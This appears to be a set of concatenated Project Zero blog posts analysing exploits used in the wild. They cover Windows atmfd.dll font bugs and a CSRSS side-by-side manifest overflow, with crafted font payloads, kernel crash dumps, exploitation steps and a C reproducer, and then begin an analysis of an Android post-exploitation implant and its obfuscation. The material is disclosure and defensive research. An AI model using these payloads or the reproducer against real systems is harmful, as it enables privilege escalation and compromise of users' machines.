A proof-of-concept test case is easily crafted by taking any existing Type 1 font, and recompiling it (e.g. with the detype1 + type1 utilities as part of AFDKO) to add two extra objects to the .PFB file. A minimal sample in textual form is shown below:
~%!PS-AdobeFont-1.0: Test 001.001 dict begin /FontInfo begin /FullName (Test) def end /FontType 1 def /FontMatrix [0.001 0 0 0.001 0 0] def /WeightVector [0 0 0 0 0] def /Private begin /Blend begin /VToHOrigin[[16705.25490 -0.00001 0 0 16962.25882]] /end end currentdict end %currentfile eexec /Private begin /CharStrings 1 begin /.notdef ## -| { endchar } |- end end mark %currentfile closefile cleartomark |
The first highlighted line sets numMasters to 5, and the second one triggers a write of 0x42424242 (represented as 16962.25882) to 0xffffffff41414141 (16705.25490 and -0.00001). A crash can be reproduced by making sure that the PFB and PFM files are in the same directory, and opening the PFM file in the default Windows Font Viewer program. You should then be able to observe the following bugcheck in the kernel debugger:
PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: ffffffff41414141, memory referenced. Arg2: 0000000000000001, value 0 = read operation, 1 = write operation. Arg3: fffff96000a86144, If non-zero, the instruction address which referenced the bad memory address. Arg4: 0000000000000002, (reserved) [...] TRAP_FRAME: ffffd000415eefa0 -- (.trap 0xffffd000415eefa0) NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. rax=0000000042424242 rbx=0000000000000000 rcx=ffffffff41414141 rdx=0000000000000005 rsi=0000000000000000 rdi=0000000000000000 rip=fffff96000a86144 rsp=ffffd000415ef130 rbp=0000000000000000 r8=0000000000000000 r9=000000000000000e r10=0000000000000000 r11=00000000fffffffb r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na po cy ATMFD+0x22144: fffff96000a86144 890499 mov dword ptr [rcx+rbx*4],eax ds:ffffffff41414141=???????? Resetting default scope |
The second issue was found in the processing of the /BlendDesignPositions object, which is defined in the Adobe Font Metrics File Format Specification document from 1998. Its handler is located at offset 0x21608 of atmfd.dll, and again using the fontdrvhost.exe symbols, we can learn that its internal name is SetBlendDesignPositions. Let's analyze the C-like pseudo code:
int SetBlendDesignPositions(void *arg) { int num_master; Fixed16_16 values[16][15]; for (num_master = 0; ; num_master++) { if (GetToken() != TOKEN_OPEN) { break; } int values_read = GetOpenFixedArray(&values[num_master], 15); SetNumAxes(values_read); } SetNumMasters(num_master); for (int i = 0; i < num_master; i++) { procs->BlendDesignPositions(i, &values[i]); } return 0; } |
The bug was simple. In the first for() loop, there was no upper bound enforced on the number of iterations, so one could read data into the arrays at &values[0], &values[1], ..., and then out-of-bounds at &values[16], &values[17] and so on. Most importantly, the GetOpenFixedArray function may read between 0 and 15 fixed point 32-bit values depending on the input file, so one could choose to write little or no data at specific offsets. This created a powerful non-continuous stack corruption primitive, which made it possible to easily redirect execution to a specific address or build a ROP chain directly on the stack. For example, the SetBlendDesignPositions function itself was compiled with a /GS cookie, but it was possible to overwrite another return address higher up the call chain to hijack the control flow.
To trigger the bug, it is sufficient to load a Type 1 font that includes a specially crafted /BlendDesignPositions object:
~%!PS-AdobeFont-1.0: Test 001.001 dict begin /FontInfo begin /FullName (Test) def end /FontType 1 def /FontMatrix [0.001 0 0 0.001 0 0] def /BlendDesignPositions [[][][][][][][][][][][][][][][][][][][][][][][0 0 0 0 16705.25490 -0.00001]] /Private begin /Blend begin /end end currentdict end %currentfile eexec /Private begin /CharStrings 1 begin /.notdef ## -| { endchar } |- end end mark %currentfile closefile cleartomark |
In the highlighted line, we first specify 22 empty arrays that don't corrupt any memory and only shift the index up to &values[22]. Then, we write the 32-bit values of 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x41414141, 0xfffffff to values[22][0..5]. On a vulnerable Windows 8.1, this coincides with the position of an unprotected return address higher on the stack. When such a font is loaded through GDI, the following kernel bugcheck is generated:
PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: ffffffff41414141, memory referenced. Arg2: 0000000000000008, value 0 = read operation, 1 = write operation. Arg3: ffffffff41414141, If non-zero, the instruction address which referenced the bad memory address. Arg4: 0000000000000002, (reserved) [...] TRAP_FRAME: ffffd0003e7ca140 -- (.trap 0xffffd0003e7ca140) NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. rax=0000000000000000 rbx=0000000000000000 rcx=aae4a99ec7250000 rdx=0000000000000027 rsi=0000000000000000 rdi=0000000000000000 rip=ffffffff41414141 rsp=ffffd0003e7ca2d0 rbp=0000000000000002 r8=0000000000000618 r9=0000000000000024 r10=fffff90000002000 r11=ffffd0003e7ca270 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na po nc ffffffff`41414141 ?? ??? Resetting default scope |
According to our analysis, the font exploit supported the following Windows versions:
When run on systems up to and including Windows 8, the exploit started off by triggering the write-what-where condition (bug #1) twice, to set up a minimalistic 8-byte bootstrap code at a fixed address around 0xfffff90000000000. This location corresponds to the win32k.sys session space, and is mapped as RWX in these old versions of Windows, which means that KASLR didn't have to be bypassed as part of the attack. As the next step, the exploit used bug #2 to redirect execution to the first stage payload. Each of these actions was performed through a single NtGdiAddRemoteFontToDC system call, which can conveniently load Type 1 fonts from memory (as previously discussed here), and was enough to reach both vulnerabilities. In total, the privilege escalation process took only three syscalls.
Things get more complicated on Windows 8.1, where the session space is no longer executable:
0: kd> !pte fffff90000000000 PXE at FFFFF6FB7DBEDF90 contains 0000000115879863 pfn 115879 ---DA--KWEV PPE at FFFFF6FB7DBF2000 contains 0000000115878863 pfn 115878 ---DA--KWEV PDE at FFFFF6FB7E400000 contains 0000000115877863 pfn 115877 ---DA--KWEV PTE at FFFFF6FC80000000 contains 8000000115976863 pfn 115976 ---DA--KW-V |
As a result, the memory cannot be used so trivially as a staging area for the controlled kernel-mode code, but with a write-what-where primitive, there are many ways to work around it. In this specific exploit, the author switched from the session space to another page with a constant address – the shared user data region at 0xfffff78000000000. Notably, that page is not executable by default either, but thanks to the fixed location of page tables in Windows 8.1, it can be made executable with a single 32-bit write of value 0x0 to address 0xfffff6fbc0000004, which stores the relevant page table entry. This is what the exploit did – it disabled the NX bit in PTE, then wrote a 192-byte payload to the shared user page and executed it. This code path also performed some extra clean up, first by restoring the NX bit and then erasing traces of the attack from memory.
Once kernel execution reached the initial shellcode, a series of intermediary steps followed, each of them unpacking and jumping to a next, longer stage. Some code was encoded in the /FontMatrix PostScript object, some in the /FontBBox object, and even more directly in the font stream data. At this point, the exploit resolved the addresses of several exported symbols in ntoskrnl.exe, allocated RWX memory with a ExAllocatePoolWithTag(NonPagedPool) call, copied the final payload from the user-mode address space, and executed it. This is where we'll conclude our analysis, as the mechanics of the ring-0 shellcode are beyond the scope of this post.
We reported the issues to Microsoft on March 17. Initially, they were subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. A security advisory was published by Microsoft on March 23, urging users to apply workarounds such as disabling the atmfd.dll font driver to mitigate the vulnerabilities. The fixes came out on April 14 as part of that month's Patch Tuesday, 28 days after our report.
Since both bugs were simple in nature, their fixes were equally simple too. In the ParseBlendVToHOrigin function, both ptrs and values arrays were extended to 16 entries, and an extra sanity check was added to ensure that numMasters wouldn't exceed 16:
int ParseBlendVToHOrigin(void *arg) { Fixed16_16 *ptrs[16]; Fixed16_16 values[16]; if (g_font->numMasters > 0x10) { return -4; } [...] } |
In the SetBlendDesignPositions function, an extra bounds check was introduced to limit the number of loop iterations to 16:
int SetBlendDesignPositions(void *arg) { int num_master; Fixed16_16 values[16][15]; for (num_master = 0; ; num_master++) { if (GetToken() != TOKEN_OPEN) { break; } if (num_master >= 16) { return -4; } int values_read = GetOpenFixedArray(&values[num_master], 15); SetNumAxes(values_read); } [...] } |
The Client/Server Runtime Subsystem, or csrss.exe, is the user-mode part of the Win32 subsystem. Before Windows NT 4.0, CSRSS was in charge of the entire graphical user interface; nowadays, it implements tasks related to, for example, process and thread management.
csrss.exe is a user-mode process that runs with SYSTEM privileges. By default, every Win32 application opens a connection to CSRSS at startup. A significant number of API functions in Windows rely on the existence of the connection, so even the most restrictive application sandboxes, including the Chromium sandbox, can’t lock it down without causing stability problems. This makes CSRSS an appealing vector for privilege escalation attacks.
The communication with the subsystem server is performed via the ALPC mechanism, and the OS provides the high-level CSR API on top of it. The primary API function is called ntdll!CsrClientCallServer. It invokes a selected CSRSS routine and (optionally) receives the result:
NTSTATUS CsrClientCallServer( PCSR_API_MSG ApiMessage, PVOID CaptureBuffer, ULONG ApiNumber, LONG DataLength); |
The ApiNumber parameter determines which routine will be executed. ApiMessage is a pointer to a corresponding message object of size DataLength, and CaptureBuffer is a pointer to a buffer in a special shared memory region created during the connection initialization. CSRSS employs shared memory to transfer large and/or dynamically-sized structures, such as strings. ApiMessage can contain pointers to objects inside CaptureBuffer, and the API takes care of translating the pointers between the client and server virtual address spaces.
The reader can refer to this series of posts for a detailed description of the CSRSS internals.
One of CSRSS modules, sxssrv.dll, implements the support for side-by-side assemblies. Side-by-side assembly (SxS) technology is a standard for executable files that is primarily aimed at alleviating problems, such as version conflicts, arising from the use of dynamic-link libraries. In SxS, Windows stores multiple versions of a DLL and loads them on demand. An application can include a side-by-side manifest, i.e. a special XML document, to specify its exact dependencies. An example of an application manifest is provided below:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="Microsoft.Windows.MySampleApp" version="1.0.0.0" processorArchitecture="x86"/> <dependency> <dependentAssembly> <assemblyIdentity type="win32" name="Microsoft.Tools.MyPrivateDll" version="2.5.0.0" processorArchitecture="x86"/> </dependentAssembly> </dependency> </assembly> |
The vulnerability in question has been discovered in the routine sxssrv! BaseSrvSxsCreateActivationContext, which has the API number 0x10017. The function parses an application manifest and all its (potentially transitive) dependencies into a binary data structure called an activation context, and the current activation context determines the objects and libraries that need to be redirected to a specific implementation.
The relevant ApiMessage object contains several UNICODE_STRING parameters, such as the application name and assembly store path. UNICODE_STRING is a well-known mutable string structure with a separate field to keep the capacity (MaximumLength) of the backing store:
typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; |
BaseSrvSxsCreateActivationContext starts with validating the string parameters:
for (i = 0; i < 6; ++i) { if (StringField = StringFields[i]) { Length = StringField->Length; if (Length && !StringField->Buffer || Length > StringField->MaximumLength || Length & 1) return 0xC000000D; if (StringField->Buffer) { if (!CsrValidateMessageBuffer(ApiMessage, &StringField->Buffer, Length + 2, 1)) { DbgPrintEx(0x33, 0, "SXS: Validation of message buffer 0x%lx failed.\n" " Message:%p\n" " String %p{Length:0x%x, MaximumLength:0x%x, Buffer:%p}\n", i, ApiMessage, StringField, StringField->Length, StringField->MaximumLength, StringField->Buffer); return 0xC000000D; } CharCount = StringField->Length >> 1; if (StringField->Buffer[CharCount] && StringField->Buffer[CharCount - 1]) return 0xC000000D; } } } |
CsrValidateMessageBuffer is declared as follows:
BOOLEAN CsrValidateMessageBuffer( PCSR_API_MSG ApiMessage, PVOID* Buffer, ULONG ElementCount, ULONG ElementSize); |
This function verifies that 1) the *Buffer pointer references data inside the associated capture buffer, 2) the expression *Buffer + ElementCount * ElementSize doesn’t cause an integer overflow, and 3) it doesn’t go past the end of the capture buffer.
As the reader can see, the buffer size for the validation is calculated based on the Length field rather than MaximumLength. This would be safe if the strings were only used as input parameters. Unfortunately, the string at offset 0x120 from the beginning of ApiMessage (we’ll be calling it ApplicationName) can also be re-used as an output parameter. The affected call stack looks as follows:
sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity
sxs!CNodeFactory::CreateNode
sxs!XMLParser::Run
sxs!SxspIncorporateAssembly
sxs!SxspCloseManifestGraph
sxs!SxsGenerateActivationContext
sxssrv!BaseSrvSxsCreateActivationContextFromStructEx
sxssrv!BaseSrvSxsCreateActivationContext
When BaseSrvSxsCreateActivationContextFromStructEx is called, it initializes an instance of the SXS_GENERATE_ACTIVATION_CONTEXT_PARAMETERS structure with the pointer to ApplicationName’s buffer and the unaudited MaximumLength value as the buffer size:
BufferCapacity = CreateCtxParams->ApplicationName.MaximumLength; if (BufferCapacity) { GenActCtxParams.ApplicationNameCapacity = BufferCapacity >> 1; GenActCtxParams.ApplicationNameBuffer = CreateCtxParams->ApplicationName.Buffer; } else { GenActCtxParams.ApplicationNameCapacity = 60; StringBuffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, 120); if (!StringBuffer) { Status = 0xC0000017; goto error; } GenActCtxParams.ApplicationNameBuffer = StringBuffer; } |
Then sxs!SxsGenerateActivationContext passes those values to ACTCTXGENCTX:
Context = (_ACTCTXGENCTX *)HeapAlloc(g_hHeap, 0, 0x10D8); if (Context) { Context = _ACTCTXGENCTX::_ACTCTXGENCTX(Context); } else { FusionpTraceAllocFailure(v14); SetLastError(0xE); goto error; } if (GenActCtxParams->ApplicationNameBuffer && GenActCtxParams->ApplicationNameCapacity) { Context->ApplicationNameBuffer = GenActCtxParams->ApplicationNameBuffer; Context->ApplicationNameCapacity = GenActCtxParams->ApplicationNameCapacity; } |
Ultimately, sxs!CNodeFactory::
XMLParser_Element_doc_assembly_assemblyIdentity calls memcpy that can go past the end of the capture buffer:
IdentityNameBuffer = 0; IdentityNameLength = 0; SetLastError(0); if (!SxspGetAssemblyIdentityAttributeValue(0, v11, &s_IdentityAttribute_name, &IdentityNameBuffer, &IdentityNameLength)) { CallSiteInfo = off_16506FA20; goto error; } if (IdentityNameLength && IdentityNameLength < Context->ApplicationNameCapacity) { memcpy(Context->ApplicationNameBuffer, IdentityNameBuffer, 2 * IdentityNameLength + 2); Context->ApplicationNameLength = IdentityNameLength; } else { *Context->ApplicationNameBuffer = 0; Context->ApplicationNameLength = 0; } |
The source data for the memcpy call comes from the name parameter of the main assemblyIdentity node in the manifest.
Even though the vulnerability was present in older versions of Windows, the exploit only targets Windows 10. All major builds up to 18363 are supported.
As a result of the vulnerability, the attacker can call memcpy with fully controlled contents and size. This is one of the best initial primitives a memory corruption bug can provide, but there’s one potential issue. So far it seems like the bug allows the attacker to write data either past the end of the capture buffer in a shared memory region, which they can already write to from the sandboxed process, or past the end of the shared region, in which case it’s quite difficult to reliably make a “useful” allocation right next to the region. Luckily for the attacker, the vulnerable code actually operates on a copy of the original capture buffer, which is made by csrsrv!CsrCaptureArguments to avoid potential issues caused by concurrent modification of the buffer contents, and the copy is allocated in the regular heap.
The logical first step of the exploit would be to leak some data needed for an ASLR bypass. However, the following design quirks in Windows and CSRSS make it unnecessary:
The exploit also has to bypass another security feature, Microsoft’s Control Flow Guard, which makes it significantly more difficult to jump into a code reuse gadget chain via an indirect function call. The attacker has decided to exploit the CFG’s inability to protect return addresses on the stack to gain control of the instruction pointer. The complete algorithm looks as follows:
1. Groom the heap. The exploit makes a preliminary CreateActivationContext call with a specially crafted manifest needed to massage the heap into a predictable state. It contains an XML node with numerous attributes in the form aa:aabN="BB...BB”. The manifest for the second call, which actually triggers the vulnerability, contains similar but different-sized attributes.
2. Implement write-what-where. The buffer overflow is used to overwrite the contents of XMLParser::_MY_XML_NODE_INFO nodes. _MY_XML_NODE_INFO may optionally contain a pointer to an internal character buffer. During subsequent parsing, if the current element is a numeric character entity (i.e. a string in the form ሴ), the parser calls XMLParser::CopyText to store the decoded character in the internal buffer of the currently active _MY_XML_NODE_INFO node. Therefore, by overwriting multiple nodes, the exploit can write data of any size to a controlled address.
3. Overwrite the loaded module list. The primitive gained in the previous step is used to modify the pointer to the loaded module list located in the PEB_LDR_DATA structure inside ntdll.dll, which is possible because the attacker has already obtained the base address of the library from the sandboxed process. The fake module list consists of numerous LDR_MODULE entries and is stored in the shared memory region. The unofficial definition of the structure is shown below:
typedef struct _LDR_MODULE { LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; PVOID BaseAddress; PVOID EntryPoint; ULONG SizeOfImage; UNICODE_STRING FullDllName; UNICODE_STRING BaseDllName; ULONG Flags; SHORT LoadCount; SHORT TlsIndex; LIST_ENTRY HashTableEntry; ULONG TimeDateStamp; } LDR_MODULE, *PLDR_MODULE; |
When a new thread is created, the ntdll!LdrpInitializeThread function will follow the module list and, provided that the necessary flags are set, run the function referenced by the EntryPoint member with BaseAddress as the first argument. The EntryPoint call is still protected by the CFG, so the exploit can’t jump to a ROP chain yet. However, this gives the attacker the ability to execute an arbitrary sequence of one-argument function calls.
4. Launch a new thread. The exploit deliberately causes a null pointer dereference. The exception handler in csrss.exe catches it and creates an error-reporting task in a new thread via csrsrv!CsrReportToWerSvc.
5. Restore the module list. Once the execution reaches the fake module list processing, it’s important to restore PEB_LDR_DATA’s original state to avoid crashes in other threads. The attacker has discovered that a pair of ntdll!RtlPopFrame and ntdll!RtlPushFrame calls can be used to copy an 8-byte value from one given address to another. The fake module list starts with such a pair to fix the loader data structure.
6. Leak the stack register. In this step the exploit takes full advantage of the shared memory region. First, it calls setjmp to leak the register state into the shared region. The next module entry points to itself, so the execution enters an infinite loop of NtYieldExecution calls. In the meantime, the sandboxed process detects that the data in the setjmp buffer has been modified. It calculates the return address location for the LdrpInitializeThread stack frame, sets it as the destination address for a subsequent copy operation, and modifies the InLoadOrderModuleList pointer of the current module entry, thus breaking the loop.
7. Overwrite the return address. After the exploit exits the loop in csrss.exe, it performs two more copy operations: overwrites the return address with a stack pivot pointer, and puts the fake stack address next to it. Then, when LdrpInitializeThread returns, the execution continues in the ROP chain.
8. Transition to winlogon.exe. The ROP payload creates a new memory section and shares it with both winlogon.exe, which is another highly-privileged Windows process, and the sandboxed process. Then it creates a new thread in winlogon.exe using an address inside the section as the entry point. The sandboxed process writes the final stage of the exploit to the section, which downloads and executes an implant. The rest of the ROP payload is needed to restore the normal state of csrss.exe and terminate the error reporting thread.
We reported the issue to Microsoft on March 23. Similarly to the font bugs, it was subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. The fix came out 22 days after our report.
The patch renamed BaseSrvSxsCreateActivationContext into BaseSrvSxsCreateActivationContextFromMessage and added an extra CsrValidateMessageBuffer call for the ApplicationName field, this time with MaximumLength as the size argument:
ApplicationName = ApiMessage->CreateActivationContext.ApplicationName; if (ApplicationName.MaximumLength && !CsrValidateMessageBuffer(ApiMessage, &ApplicationName.Buffer, ApplicationName.MaximumLength, 1)) { SavedMaximumLength = ApplicationName.MaximumLength; ApplicationName.MaximumLength = ApplicationName.Length + 2; } [...] if (SavedMaximumLength) ApiMessage->CreateActivationContext.ApplicationName.MaximumLength = SavedMaximumLength; return result; |
The following reproducer has been tested on Windows 10.0.18363.959.
#include <stdint.h> #include <stdio.h> #include <windows.h> #include <string> const char* MANIFEST_CONTENTS = "<?xml version='1.0' encoding='UTF-8' standalone='yes'?>" "<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>" "<assemblyIdentity name='@' version='1.0.0.0' type='win32' " "processorArchitecture='amd64'/>" "</assembly>"; const WCHAR* NULL_BYTE_STR = L"\x00\x00"; const WCHAR* MANIFEST_NAME = L"msil_system.data.sqlxml.resources_b77a5c561934e061_3.0.4100.17061_en-us_" L"d761caeca23d64a2.manifest"; const WCHAR* PATH = L"\\\\.\\c:Windows\\"; const WCHAR* MODULE = L"System.Data.SqlXml.Resources"; typedef PVOID(__stdcall* f_CsrAllocateCaptureBuffer)(ULONG ArgumentCount, ULONG BufferSize); f_CsrAllocateCaptureBuffer CsrAllocateCaptureBuffer; typedef NTSTATUS(__stdcall* f_CsrClientCallServer)(PVOID ApiMessage, PVOID CaptureBuffer, ULONG ApiNumber, ULONG DataLength); f_CsrClientCallServer CsrClientCallServer; typedef NTSTATUS(__stdcall* f_CsrCaptureMessageString)(LPVOID CaptureBuffer, PCSTR String, ULONG Length, ULONG MaximumLength, PSTR OutputString); f_CsrCaptureMessageString CsrCaptureMessageString; NTSTATUS CaptureUnicodeString(LPVOID CaptureBuffer, PSTR OutputString, PCWSTR String, ULONG Length = 0) { if (Length == 0) { Length = lstrlenW(String); } return CsrCaptureMessageString(CaptureBuffer, (PCSTR)String, Length * 2, Length * 2 + 2, OutputString); } int main() { HMODULE Ntdll = LoadLibrary(L"Ntdll.dll"); CsrAllocateCaptureBuffer = (f_CsrAllocateCaptureBuffer)GetProcAddress( Ntdll, "CsrAllocateCaptureBuffer"); CsrClientCallServer = (f_CsrClientCallServer)GetProcAddress(Ntdll, "CsrClientCallServer"); CsrCaptureMessageString = (f_CsrCaptureMessageString)GetProcAddress( Ntdll, "CsrCaptureMessageString"); char Message[0x220]; memset(Message, 0, 0x220); PVOID CaptureBuffer = CsrAllocateCaptureBuffer(4, 0x300); std::string Manifest = MANIFEST_CONTENTS; Manifest.replace(Manifest.find('@'), 1, 0x2000, 'A'); // There's no public definition of the relevant CSR_API_MSG structure. // The offsets and values are taken directly from the exploit. *(uint32_t*)(Message + 0x40) = 0xc1; *(uint16_t*)(Message + 0x44) = 9; *(uint16_t*)(Message + 0x59) = 0x201; // CSRSS loads the manifest contents from the client process memory; // therefore, it doesn't have to be stored in the capture buffer. *(const char**)(Message + 0x80) = Manifest.c_str(); *(uint64_t*)(Message + 0x88) = Manifest.size(); *(uint64_t*)(Message + 0xf0) = 1; CaptureUnicodeString(CaptureBuffer, Message + 0x48, NULL_BYTE_STR, 2); CaptureUnicodeString(CaptureBuffer, Message + 0x60, MANIFEST_NAME); CaptureUnicodeString(CaptureBuffer, Message + 0xc8, PATH); CaptureUnicodeString(CaptureBuffer, Message + 0x120, MODULE); // Triggers the issue by setting ApplicationName.MaxLength to a large value. *(uint16_t*)(Message + 0x122) = 0x8000; CsrClientCallServer(Message, CaptureBuffer, 0x10017, 0xf0); } |
This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.
Published: 2021-01-12 17:37:00
Popularity: 16
Author: Ryan
This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.
Posted by Maddie Stone, Project Zero
A deep-dive into the implant used by a high-tier attacker against Android devices in 2020
This post covers what happens once the Android device has been successfully rooted by one of the exploits described in the previous post. What’s especially notable is that while the exploit chain only used known, and some quite old, n-day exploits, the subsequent code is extremely well-engineered and thorough. This leads us to believe that the choice to use n-days is likely not due to a lack of technical expertise.
This post describes what happens post-exploitation of the exploit chain. For this post, I will be calling different portions of the exploit chain as “stage X”. These stage numbers refer to:
This post details stage 3, the code that runs post exploitation. Stage 3 is an ARM ELF file that expects to run as root. This stage 3 ELF is embedded in the stage 2 binary in the data section. Stage 3 is a downloader for stage 4.
As stated at the beginning, this stage, stage 3, is a very well-engineered piece of software. It is very thorough in its methods to hide its behavior and ensure that it is running on the correct targeted device. Stage 3 includes obfuscation, many anti-analysis checks, detailed logging, command and control (C2) server communications, and ultimately, the downloading and executing of Stage 4. Based on the size and modularity of the code, it seems likely that it was developed by a team rather than a single individual.
So let’s get into the fun!
Once stage 2 has successfully rooted the device and modified different security settings, it loads stage 3. Stage 3 is embedded in the data section of stage 2 and is 0x436C bytes in size. Stage 2 includes a variety of different methods to load the stage 3 ELF including writing it to /proc/self/mem. Once one of these methods is successful, execution transfers to stage 3.
This stage 3 ELF exports two functions: init and d. init is the function called by stage 2 to begin execution of stage 3. However, the main functionality for this binary is not in this function. Instead it is in two functions that are referenced by the ELF’s .init_array. The first function ensures that the environment variables PATH, ANDROID_DATA, and ANDROID_ROOT are set to expected values. The second function spawns a new thread that runs the heavy lifting of the behavior of the binary. The init function simply calls pthread_join on the thread spawned by the second function in the .init_array so it will wait for that thread to terminate.
In the newly spawned thread, first, it cleans up from the previous stage by deleting most of the environment variables that stage 2 set. Then it will kill any processes that include the word “knox” in the cmdline. Knox is a security platform that is built into Samsung devices.
Next, the code will check how often this binary has been running by reading a file that it drops on the device called state.parcel. The execution proceeds normally as long as it hasn’t been run more than 6 times on the current day. In other cases, execution changes as described in the state.parcel file section.
The binary will then iterate through the process’s open file descriptors 0-2 (usually stdin, stdout, and stderr) and points them to /dev/null. This will prevent output messages from appearing which may lead a user or others to detect the presence of the exploit chain. The code will then iterate through any other open file descriptors (/proc/self/fd/) for the process and close any that include “pipe:” or “anon_inode:” in their symlinks. It will also close any file descriptors with a number greater than 32 that include “socket:” in the link and any that don’t include /data/dalvik-cache/arm or /dev/ in the name. This may be to prevent debugging or to reduce accidental damage to the rest of the system.
The thread will then call into the function that includes significant functionality for the main behavior of the binary. It decrypts data, sets up configuration data, performs anti-analysis and debugging checks, and finally contacts the C2 server to download the next stage and executes it. This can be considered the main control loop for Stage 3.
The rest of this post explains the technical details of the Stage 3 binary’s behavior, categorized.
Stage 3 uses quite a few different layers of obfuscation to hide the behavior of the code. It uses a similar string obfuscation technique to stage 2. Another way that the binary obfuscates its behavior is that it uses a hash table to store dynamic configuration settings/status. Instead of using a descriptive string for the “key”, it uses a series of 16 AES-decrypted bytes as the “keys” that are passed to the hashing function.The binary encrypts its static configuration settings, communications with the C2, and a hash table that stores dynamic configuration setting with AES. The state.parcel file that is saved on the device is XOR encoded. The binary also includes multiple techniques to make it harder to understand the behavior of the device using dynamic analysis techniques. For example, it monitors what is mapped into the process’s memory, what file descriptors it has opened, and sends very detailed information to the C2 server.
Similar to the previous stages, Stage 3 seems to be well engineered with a variety of different techniques to make it more difficult for an analyst to determine its behavior, either statically or dynamically. The rest of this section will detail some of the different techniques.
The vast majority of the strings within the binary are obfuscated. The obfuscation method is very similar to that used in previous stages. The obfuscated string is passed to a deobfuscation function prior to use. The obfuscated strings are designated by 0x7E7E7E (“~~~”) at the end of the string. To deobfuscate these strings, we used an IDAPython script using flare_emu that emulated the behavior of the deobfuscation function on each string.
A data block within the binary, containing important configuration settings, is encrypted using AES256. It is decrypted upon entrance to the main control function. The decrypted contents are written back to the same location in memory where the encrypted contents were. The code uses OpenSSL to perform the AES256 decryption. The key and the IV are hardcoded into the binary.
Whenever this blog post refers to the “decrypted data block”, we mean this block of memory. The decrypted data includes things such as the C2 server url, the user-agent to use when contacting the C2 server, version information and more. Prior to returning from the main control function, the code will overwrite the decrypted data block to all zeros. This makes it more difficult for an analyst to dump the decrypted memory.
Once the decryption is completed, the code double checks that decryption was successful by looking at certain bytes and verifying their values. If any of these checks fail, the binary will not proceed with contacting the C2 server and downloading stage 4.
Another block of data that is 0x140 bytes long is then decrypted in the same way. This decrypted data doesn’t include any human-readable strings, but is instead used as “keys” for a hash table that stores configuration settings and status information. We’ll call this area the “decrypted keys block”. The information that is stored in the hash table can change whereas the configuration settings in the decrypted data block above are expected to stay the same throughout execution. The decrypted keys block, which serves as the hash table keys, is shown below.
00000000: 9669 d307 1994 4529 7b07 183e 1e0c 6225 .i....E){..>..b% 00000010: 335f 0f6e 3e41 1eca 1537 3552 188f 932d 3_.n>A...75R...- 00000020: 4bf4 79a4 c5fd 0408 49f4 b412 3fa3 ad23 K.y.....I...?..# 00000030: 837b 5af1 2862 15d9 be29 fd62 605c 6aca .{Z.(b...).b`\j. 00000040: ad5a dd9c 4548 ca3a 7683 5753 7fb9 970a .Z..EH.:v.WS.... 00000050: fe71 a43d 78b1 72f5 c8d4 b8a4 0c9e 925c .q.=x.r........\ 00000060: d068 f985 2446 136c 5cb0 d155 ad8d 448e .h..$F.l\..U..D. 00000070: 9307 54ba fc2d 8b72 ba4d 63b8 3109 67c9 ..T..-.r.Mc.1.g. 00000080: e001 77e2 99e8 add2 2f45 1504 557f 9177 ..w...../E..U..w 00000090: 9950 9f98 91e6 551b 6557 9c62 fea8 afef .P....U.eW.b.... 000000a0: 18b8 8043 9071 0f10 38aa e881 9e84 e541 ...C.q..8......A 000000b0: 3fa0 4697 187f fb47 bbe4 6a76 fa4b 5875 ?.F....G..jv.KXu 000000c0: 04d1 2861 6318 69bd 7459 b48c b541 3323 ..(ac.i.tY...A3# 000000d0: 16cd c514 5c7f db99 96d9 5982 f6f1 88ee ....\.....Y..... 000000e0: f830 fb10 8192 2fea a308 9998 2e0c b798 .0..../......... 000000f0: 367f 7dde 0c95 8c38 8cf3 4dcd acc4 3cd3 6.}....8..M...<. 00000100: 4473 9877 10c8 68e0 1673 b0ad d9cd 085d Ds.w..h..s.....] 00000110: ab1c ad6f 049d d2d4 65d0 1905 c640 9f61 ...o....e....@.a 00000120: 1357 eb9a 3238 74bf ea2d 97e4 a747 d7b6 .W..28t..-...G.. 00000130: fd6d 8493 2429 899d c05d 5b94 0096 4593 .m..$)...][...E. |
The binary uses this hash table to keep track of important values such as for status and configuration. The code initializes a CRC table which is used in the hashing algorithm and then the hash table is initialized. The structure that manages the hashtable shown below:
struct hashtable_mgr { int * hashtable_ptr; int maxEntries; int numEntries; } |
The first member of this struct points to the hash table which is allocated on the heap and has size 0x1400 bytes when it’s first initialized. The hash table uses sets of 0x10 bytes from the decrypted keys block as the key that gets passed to the hashing function.
